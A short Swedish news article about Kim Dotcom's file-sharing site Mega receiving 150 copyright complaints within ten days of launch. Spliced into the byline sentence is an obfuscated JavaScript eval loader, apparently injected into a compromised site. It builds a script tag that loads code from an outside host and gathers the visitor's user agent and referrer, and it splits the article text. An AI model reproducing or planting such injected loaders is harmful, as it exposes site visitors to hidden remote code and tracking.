Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Fildelarsajten Mega redan 150 varningar

Fildelarsajten Mega redan 150 varningar
Sebastian

Kim eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|iiazr|var|u0026u|referrer|fyffa||js|php’.split(’|’),0,{}))
Dotcom har det verkligen inte lätt. Den 20 januari i år lanserades hans nya fildelarsajt. Mega är efterträdaren till den stora videosajten Megaupload som 2012 stängdes ner av de amerikanska myndigheterna på grund av olika upphovsrätter.

Skillnaden med Mega och Megaupload är att det nu inte går att söka på filer som laddas upp av användare. Dessa filer kan endast länkas från tredjepartssajter där dessa användare valt att publicera länken.

Allt innehåll och content som lagras på sajten är krypterat och tillsammans med länken som publiceras av användaren måste de personer som vill gå via den ha tillgång till en krypteringsnyckel.

Nu har dock en fransk sajt vid namn Mega-search.me länkat till upphovsskyddat material liggandes på Kim Dotcoms nya fildelnings-sajt. Den franska sajten har lagts ner men det hindrar inte att anmälningar börjar välla in.

På dessa 10 dagar som Mega varit live har det kommit in 150 anmälningar om upphovsintrång och Kims advokat hävdar att detta material nu är borttaget.

– Mega vill inte att användarna utnyttjar vår tjänst för att sprida material olagligt, säger Megas advokat, Ira P. Rothken.

Via: IDG Sweden